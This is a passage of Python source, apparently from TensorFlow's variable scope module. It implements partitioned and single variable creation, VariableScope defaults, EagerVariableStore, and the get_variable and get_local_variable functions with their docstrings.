partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
shape: shape of the new or existing sharded variable.
dtype: type of the new or existing sharded variable
(defaults to `DT_FLOAT`).
initializer: initializer for the sharded variable.
regularizer: a (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable which has well-defined semantics. Defaults
to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
when violating reuse during variable creation, or if an existing
sharded variable exists for the given name but with different sharding.
"""
initializing_from_value = initializer is not None and isinstance(
initializer, ops.Tensor)
if name in self._vars:
raise ValueError(
"A partitioner was provided, but an unpartitioned version of the "
"variable was found: %s. Perhaps a variable of the same name was "
"already created without partitioning?" % name)
shape = tensor_shape.as_shape(shape)
if initializing_from_value:
shape = shape.merge_with(initializer.get_shape())
partitions = None
if not reuse or partitioner:
partitions = _call_partitioner(partitioner, shape, dtype)
if name in self._partitioned_vars:
if reuse is False:
raise ValueError(
"Partitioned variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?"
% name)
existing_var = self._partitioned_vars[name]
if not shape.is_compatible_with(existing_var.get_shape()):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified shape %s "
"and found shape %s."
% (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified dtype %s "
"and found dtype %s."
% (name, dtype.name, existing_var.dtype.name))
# pylint: disable=protected-access
if (partitions is not None and
existing_var._get_partitions() != partitions):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified partitions "
"%s and found partitions %s." %
(name, partitions, existing_var._get_partitions()))
# pylint: enable=protected-access
return existing_var
if reuse is True:
raise ValueError("PartitionedVariable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
slice_dim, num_slices = _get_slice_dim_and_num_slices(partitions)
if "%s/part_0" % name in self._vars:
if "%s/part_%d" % (name, num_slices - 1) not in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but %s/part_%d was not."
% (num_slices, name, name, num_slices - 1))
if "%s/part_%d" % (name, num_slices) in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but so was the extra shard %s/part_%d."
% (num_slices, name, name, num_slices))
vs = []
for i, (var_offset, var_shape) in enumerate(_iter_slices(
shape.as_list(),
num_slices,
slice_dim
)):
partition_info = _PartitionInfo(
full_shape=shape.as_list(), var_offset=var_offset)
var_full_name = "%s/part_%d" % (name, i)
with ops.name_scope(var_full_name + "/PartitionedInitializer"):
# Create the tensor to initialize the variable with default value.
if initializer is None:
init, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
if initializing_from_value:
init_shape = None
else:
init_shape = var_shape
elif callable(initializer):
init = initializer
init_shape = var_shape
elif isinstance(initializer, ops.Tensor):
init = array_ops.slice(initializer, var_offset, var_shape)
# Use the dtype of the given tensor.
dtype = init.dtype.base_dtype
init_shape = None
else:
init = ops.convert_to_tensor(initializer, dtype=dtype)
init = array_ops.slice(init, var_offset, var_shape)
init_shape = None
with ops.name_scope(None):
var = self._get_single_variable(
name=var_full_name,
shape=init_shape,
dtype=dtype,
initializer=init,
partition_info=partition_info,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: disable=protected-access
var._set_save_slice_info(variables.Variable.SaveSliceInfo(
name, shape.as_list(), var_offset, var_shape))
vs.append(var)
# pylint: enable=protected-access
partitioned_var = variables.PartitionedVariable(name=name,
shape=shape,
dtype=dtype,
variable_list=vs,
partitions=partitions)
if not context.executing_eagerly() or self._store_eager_variables:
self._partitioned_vars[name] = partitioned_var
return partitioned_var
def _get_single_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
partition_info=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Get or create a single Variable (e.g. a shard or entire variable).
See the documentation of get_variable above (ignore partitioning components)
for details.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
initializer: see get_variable.
regularizer: see get_variable.
partition_info: _PartitionInfo object.
reuse: see get_variable.
trainable: see get_variable.
collections: see get_variable.
caching_device: see get_variable.
validate_shape: see get_variable.
use_resource: see get_variable.
constraint: see get_variable.
synchronization: see get_variable.
aggregation: see get_variable.
Returns:
A Variable. See documentation of get_variable above.
Raises:
ValueError: See documentation of get_variable above.
"""
# Set to true if initializer is a constant.
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if shape is not None and initializing_from_value:
raise ValueError("If initializer is a constant, do not specify shape.")
dtype = dtypes.as_dtype(dtype)
shape = tensor_shape.as_shape(shape)
if name in self._vars:
# Here we handle the case when returning an existing variable.
if reuse is False:
var = self._vars[name]
err_msg = ("Variable %s already exists, disallowed."
" Did you mean to set reuse=True or "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# ResourceVariables don't have an op associated with so no traceback
if isinstance(var, resource_variable_ops.ResourceVariable):
raise ValueError(err_msg)
tb = var.op.traceback[::-1]
# Throw away internal tf entries and only take a few lines. In some
# cases the traceback can be longer (e.g. if someone uses factory
# functions to create variables) so we take more than needed in the
# default case.
tb = [x for x in tb if "tensorflow/python" not in x[0]][:5]
raise ValueError("%s Originally defined at:\n\n%s" % (err_msg, "".join(
traceback.format_list(tb))))
found_var = self._vars[name]
if not shape.is_compatible_with(found_var.get_shape()):
raise ValueError("Trying to share variable %s, but specified shape %s"
" and found shape %s." % (name, shape,
found_var.get_shape()))
if not dtype.is_compatible_with(found_var.dtype):
dtype_str = dtype.name
found_type_str = found_var.dtype.name
raise ValueError("Trying to share variable %s, but specified dtype %s"
" and found dtype %s." % (name, dtype_str,
found_type_str))
return found_var
# The code below handles only the case of creating a new variable.
if reuse is True:
raise ValueError("Variable %s does not exist, or was not created with "
"tf.get_variable(). Did you mean to set "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# Create the tensor to initialize the variable with default value.
if initializer is None:
initializer, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
# Enter an init scope when creating the initializer.
with ops.init_scope():
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if tf_inspect.isclass(initializer):
initializer = initializer(dtype=dtype)
if shape is not None and shape.is_fully_defined():
init_val = lambda: initializer( # pylint: disable=g-long-lambda
shape.as_list(), dtype=dtype, partition_info=partition_info)
variable_dtype = dtype.base_dtype
elif len(tf_inspect.getargspec(initializer).args) == len(
tf_inspect.getargspec(initializer).defaults or []):
init_val = initializer
variable_dtype = None
else:
raise ValueError("The initializer passed is not valid. It should "
"be a callable with no arguments and the "
"shape should not be provided or an instance of "
"`tf.keras.initializers.*' and `shape` should be "
"fully defined.")
# Create the variable.
if use_resource is None:
# Set the default value if unspecified.
use_resource = _DEFAULT_USE_RESOURCE
v = variables.VariableV1(
initial_value=init_val,
name=name,
trainable=trainable,
collections=collections,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation)
if context.executing_eagerly() and self._store_eager_variables:
if collections:
ops.add_to_collections(collections, v)
else:
ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, v)
if trainable:
ops.add_to_collection(ops.GraphKeys.TRAINABLE_VARIABLES, v)
if not context.executing_eagerly() or self._store_eager_variables:
# In eager mode we do not want to keep default references to Variable
# objects as this will prevent their memory from being released.
self._vars[name] = v
logging.vlog(1, "Created variable %s with shape %s and init %s", v.name,
format(shape), initializer)
# Run the regularizer if requested and save the resulting loss.
if regularizer:
with ops.colocate_with(v):
with ops.name_scope(name + "/Regularizer/"):
with ops.init_scope():
loss = regularizer(v)
if loss is not None:
if context.executing_eagerly():
v_name = "v_%s" % type(v)
loss_name = "loss_%s" % type(loss)
else:
v_name = v.name
loss_name = loss.name
logging.vlog(1, "Applied regularizer to %s and added the result %s "
"to REGULARIZATION_LOSSES.", v_name, loss_name)
ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES, loss)
return v
# Initialize variable when no initializer provided
def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32):
"""Provide a default initializer and a corresponding value.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
Returns:
initializer and initializing_from_value. See get_variable above.
Raises:
ValueError: When giving unsupported dtype.
"""
del shape
# If dtype is DT_FLOAT, provide a uniform unit scaling initializer
if dtype.is_floating:
initializer = init_ops.glorot_uniform_initializer()
initializing_from_value = False
# If dtype is DT_INT/DT_UINT, provide a default value `zero`
# If dtype is DT_BOOL, provide a default value `FALSE`
elif (dtype.is_integer or dtype.is_unsigned or dtype.is_bool
or dtype == dtypes.string):
initializer = init_ops.zeros_initializer()
initializing_from_value = False
# NOTES:Do we need to support for handling DT_STRING and DT_COMPLEX here?
else:
raise ValueError("An initializer for variable %s of %s is required"
% (name, dtype.base_dtype))
return initializer, initializing_from_value
# To stop regularization, use this regularizer
@tf_export("no_regularizer")
def no_regularizer(_):
"""Use this function to prevent regularization of variables."""
return None
# TODO(alive): support caching devices and partitioned variables in Eager mode.
@tf_export(v1=["VariableScope"])
class VariableScope(object):
"""Variable scope object to carry defaults to provide to `get_variable`.
Many of the arguments we need for `get_variable` in a variable store are most
easily handled with a context. This object is used for the defaults.
Attributes:
name: name of the current scope, used as prefix in get_variable.
initializer: default initializer passed to get_variable.
regularizer: default regularizer passed to get_variable.
reuse: Boolean, None, or tf.AUTO_REUSE, setting the reuse in
get_variable. When eager execution is enabled this argument is always
forced to be False.
caching_device: string, callable, or None: the caching device passed to
get_variable.
partitioner: callable or `None`: the partitioner passed to `get_variable`.
custom_getter: default custom getter passed to get_variable.
name_scope: The name passed to `tf.name_scope`.
dtype: default type passed to get_variable (defaults to DT_FLOAT).
use_resource: if False, create a normal Variable; if True create an
experimental ResourceVariable with well-defined semantics. Defaults
to False (will later change to True). When eager execution is enabled
this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
"""
def __init__(self,
reuse,
name="",
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
name_scope="",
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a new VariableScope with the given properties."""
self._name = name
self._initializer = initializer
self._regularizer = regularizer
self._reuse = reuse
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._name_scope = name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if context.executing_eagerly():
if self._caching_device is not None:
raise NotImplementedError("Caching devices is not yet supported "
"when eager execution is enabled.")
self._reuse = AUTO_REUSE
self._use_resource = True
@property
def name(self):
return self._name
@property
def original_name_scope(self):
return self._name_scope
@property
def reuse(self):
return self._reuse
@property
def initializer(self):
return self._initializer
@property
def dtype(self):
return self._dtype
@property
def use_resource(self):
return self._use_resource
@property
def regularizer(self):
return self._regularizer
@property
def caching_device(self):
return self._caching_device
@property
def partitioner(self):
return self._partitioner
@property
def custom_getter(self):
return self._custom_getter
@property
def constraint(self):
return self._constraint
def reuse_variables(self):
"""Reuse variables in this scope."""
self._reuse = True
def set_initializer(self, initializer):
"""Set initializer for this scope."""
self._initializer = initializer
def set_dtype(self, dtype):
"""Set data type for this scope."""
self._dtype = dtype
def set_use_resource(self, use_resource):
"""Sets whether to use ResourceVariables for this scope."""
if context.executing_eagerly() and not use_resource:
raise ValueError("When eager execution is enabled, "
"use_resource cannot be set to false.")
self._use_resource = use_resource
def set_regularizer(self, regularizer):
"""Set regularizer for this scope."""
self._regularizer = regularizer
def set_caching_device(self, caching_device):
"""Set caching_device for this scope."""
if context.executing_eagerly():
raise NotImplementedError("Caching devices are not yet supported "
"when eager execution is enabled.")
self._caching_device = caching_device
def set_partitioner(self, partitioner):
"""Set partitioner for this scope."""
self._partitioner = partitioner
def set_custom_getter(self, custom_getter):
"""Set custom getter for this scope."""
self._custom_getter = custom_getter
def get_collection(self, name):
"""Get this scope's variables."""
scope = self._name + "/" if self._name else ""
return ops.get_collection(name, scope)
def trainable_variables(self):
"""Get this scope's trainable variables."""
return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
def global_variables(self):
"""Get this scope's global variables."""
return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
def local_variables(self):
"""Get this scope's local variables."""
return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES)
def get_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if regularizer is None:
regularizer = self._regularizer
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if custom_getter is None:
custom_getter = self._custom_getter
if context.executing_eagerly():
reuse = False
use_resource = True
else:
if reuse is None:
reuse = self._reuse
if use_resource is None:
use_resource = self._use_resource
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if constraint is None:
constraint = self._constraint
if dtype is None:
dtype = self._dtype
return var_store.get_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if initializer is None:
initializer = self._initializer
if regularizer is None:
regularizer = self._regularizer
if constraint is None:
constraint = self._constraint
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if dtype is None:
dtype = self._dtype
if use_resource is None:
use_resource = self._use_resource
if self._custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % self._custom_getter)
if partitioner is None:
raise ValueError("No partitioner was specified")
# This allows the variable scope name to be used as the variable name if
# this function is invoked with an empty name arg, for backward
# compatibility with create_partitioned_variables().
full_name_list = []
if self.name:
full_name_list.append(self.name)
if name:
full_name_list.append(name)
full_name = "/".join(full_name_list)
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# pylint: disable=protected-access
return var_store._get_partitioned_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=self.reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
_VARSTORE_KEY = ("__variable_store",)
_VARSCOPESTORE_KEY = ("__varscope",)
class _VariableScopeStore(threading.local):
"""A thread local store for the current variable scope and scope counts."""
def __init__(self):
super(_VariableScopeStore, self).__init__()
self.current_scope = VariableScope(False)
self.variable_scopes_count = {}
def open_variable_scope(self, scope_name):
if scope_name in self.variable_scopes_count:
self.variable_scopes_count[scope_name] += 1
else:
self.variable_scopes_count[scope_name] = 1
def close_variable_subscopes(self, scope_name):
for k in list(self.variable_scopes_count.keys()):
if scope_name is None or k.startswith(scope_name + "/"):
self.variable_scopes_count[k] = 0
def variable_scope_count(self, scope_name):
return self.variable_scopes_count.get(scope_name, 0)
def get_variable_scope_store():
"""Returns the variable scope store for current thread."""
scope_store = ops.get_collection(_VARSCOPESTORE_KEY)
if not scope_store:
scope_store = _VariableScopeStore()
ops.add_to_collection(_VARSCOPESTORE_KEY, scope_store)
else:
scope_store = scope_store[0]
return scope_store
@tf_export(v1=["get_variable_scope"])
def get_variable_scope():
"""Returns the current variable scope."""
return get_variable_scope_store().current_scope
def _get_default_variable_store():
store = ops.get_collection(_VARSTORE_KEY)
if store:
return store[0]
store = _VariableStore()
ops.add_to_collection(_VARSTORE_KEY, store)
return store
@tf_contextlib.contextmanager
def with_variable_store(store):
store_collection = ops.get_collection_ref(_VARSTORE_KEY)
old = list(store_collection)
store_collection[:] = [store]
try:
yield
finally:
store_collection[:] = old
class EagerVariableStore(object):
"""Wrapper allowing functional layers to be used with eager execution.
When eager execution is enabled Variables get deleted when they go out of
scope, and are not stored in global collections by default. A lot of code
(mostly the functional layers in tf.layers) assumes that variables are kept in
a global list.
EagerVariableStore can be used in conjunction with this code to make it
eager-friendly. For example, to create a dense layer, use:
```
container = tfe.EagerVariableStore()
for input in dataset_iterator:
with container.as_default():
x = tf.layers.dense(input, name="l1")
print(container.variables) # Should print the variables used in the layer.
```
"""
def __init__(self, store=None):
if store is not None:
if not store._store_eager_variables: # pylint: disable=protected-access
raise ValueError("Cannot construct EagerVariableStore from a "
"VariableStore object that does not hold eager "
"variables.")
self._store = store
else:
self._store = _VariableStore()
self._store._store_eager_variables = True # pylint: disable=protected-access
def as_default(self):
return with_variable_store(self._store)
def variables(self):
return sorted(self._store._vars.values(), key=lambda x: x.name) # pylint: disable=protected-access
def trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def non_trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if not x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def copy(self):
"""Copy this variable store and all of its contents.
Variables contained in this store will be copied over to the new variable
store, meaning that they can be modified without affecting the variables in
this store.
Returns:
A new EagerVariableStore instance containing copied variables.
"""
# pylint: disable=protected-access
new_store = EagerVariableStore()
for key, var in iteritems(self._store._vars):
# Strip device out of variable name.
try:
index = var.name.index(":")
except ValueError:
stripped_var_name = var.name
else:
stripped_var_name = var.name[:index]
# Create new variable with same value, name, and "trainable" flag.
new_var = resource_variable_ops.ResourceVariable(
var.read_value(),
name=stripped_var_name,
trainable=var.trainable)
new_store._store._vars[key] = new_var
return new_store
# pylint: enable=protected-access
# The argument list for get_variable must match arguments to get_local_variable.
# So, if you are updating the arguments, also update arguments to
# get_local_variable below.
@tf_export(v1=["get_variable"])
def get_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
return get_variable_scope().get_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
get_variable_or_local_docstring = ("""%s
%sThis function prefixes the name with the current variable scope
and performs reuse checks. See the
[Variable Scope How To](https://tensorflow.org/guide/variables)
for an extensive description of how reusing works. Here is a basic example:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
If initializer is `None` (the default), the default initializer passed in
the variable scope will be used. If that one is `None` too, a
`glorot_uniform_initializer` will be used. The initializer can also be
a Tensor, in which case the variable is initialized to this value and shape.
Similarly, if the regularizer is `None` (the default), the default regularizer
passed in the variable scope will be used (if that is `None` too,
then by default no regularization is performed).
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created. Can either be
an initializer object or a Tensor. If it's a Tensor, its shape must be known
unless validate_shape is False.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
`tf.GraphKeys.REGULARIZATION_LOSSES` and can be used for regularization.
%scollections: List of graph collections keys to add the Variable to.
Defaults to `[%s]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known. For this to be used the initializer must be a Tensor and
not an initializer object.
use_resource: If False, creates a regular Variable. If true, creates an
experimental ResourceVariable instead with well-defined semantics.
Defaults to False (will later change to True). When eager execution is
enabled this argument is always forced to be True.
custom_getter: Callable that takes as a first argument the true getter, and
allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when violating reuse during variable creation, or when `initializer` dtype
and `dtype` don't match. Reuse is set inside `variable_scope`.
""")
get_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing variable with these parameters or create a new one.",
"",
"trainable: If `True` also add the variable to the graph collection\n"
" `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n ",
"GraphKeys.GLOBAL_VARIABLES")
# The argument list for get_local_variable must match arguments to get_variable.
# So, if you are updating the arguments, also update arguments to get_variable.
@tf_export(v1=["get_local_variable"])
def get_local_variable( # pylint: disable=missing-docstring
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=False, # pylint: disable=unused-argument
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
if collections:
collections += [ops.GraphKeys.LOCAL_VARIABLES]
else:
collections = [ops.GraphKeys.LOCAL_VARIABLES]
return get_variable(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=False,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation,
custom_getter=custom_getter,
constraint=constraint)
get_local_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing *local* variable or creates a new one.",
"Behavior is the same as in `get_variable`, except that variables are\n"
"added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n"
"`False`.\n",
"",
"GraphKeys.LOCAL_VARIABLES")
def _get_partitioned_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable instead which has well-defined semantics.
Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A tuple `(shards, partitions)` where `shards` is the list of `Variable`
shards and `partitions` is the output of the partitioner on the input
shape.
Raises:
ValueError: when creating a new variable and shape is not declared,
or when violating reuse during variable creation. Reuse is set inside
`variable_scope`.
"""
# pylint: disable=protected-access
scope = get_variable_scope()
if scope.custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
